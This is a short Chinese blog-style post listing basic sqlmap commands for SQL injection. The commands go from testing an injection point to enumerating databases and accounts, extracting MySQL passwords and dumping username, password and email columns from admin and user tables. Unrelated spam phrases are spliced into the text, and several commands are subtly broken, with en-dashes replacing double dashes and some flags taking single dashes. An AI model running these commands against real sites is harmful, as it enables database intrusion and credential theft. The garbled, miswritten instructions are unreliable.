salmap简单的使用步骤
大家或许和我有同样的感受,不想花费大量时间观看视频来学习这个工具。入源因此,入源jdqs源码我整理了以下sqlmap的入源基本使用步骤,供大家参考。入源聚合支付系统源码java(如有不对之处,入源爬php的源码文件欢迎在评论区指出)
sqlmap的入源简单使用步骤:
1. 清除sqlmap缓存:
python sqlmap.py --purge
2. 检测注入点是否可用:
python sqlmap.py -u "URL"
3. 暴库:
python sqlmap.py -u "URL" -dbs
4. 暴当前使用的数据库:
python sqlmap.py -u "URL" –current-db
5. 暴当前使用的账户:
python sqlmap.py -u "URL" –current-user
6. 列出所有使用过的账户:
python sqlmap.py -u "URL" –users
7. 查询mysql的登录账户和密码:
python sqlmap.py -u "URL" –passwords
8. 列出数据库中的表:
python sqlmap.py -u "URL" -D "指定的数据库名" –tables
9. 列出表中字段:
python sqlmap.py -u "URL" -D "指定数据库名" -T "指定的表名" –columns
. 爆字段内容:
python sqlmap.py -u "URL" -D "指定数据库名" -T "指定的表名" -C "字段名" -dump
此外,还有一些参数可供使用:
1. 列数据库信息:--dbs
2. web当前使用的入源数据库:--current-db
3. web数据库使用账户:--current-user
4. 列出sqlserver所有用户:--users
5. 数据库账户与密码:--passwords
6. 指定库名列出所有表:-D database --tables
-D:指定数据库名称
7. 指定库名表名列出所有字段:-D antian-T admin --columns
-T:指定要列出字段的表
8. 指定库名表名字段dump出指定字段:
-D secbang_com -T admin -C id,password,username --dump
-D antian -T userb -C"email,Username,userpassword" --dump
可加双引号,也可不加双引号。入源
9. 导出多少条数据:
-D tourdata -T userb -C"email,入源Username,userpassword" --start 1 --stop --dump
希望这些信息能对大家有所帮助!
入源2024-12-24 00:13
2024-12-24 00:07
2024-12-23 23:50
2024-12-23 22:23
2024-12-23 21:57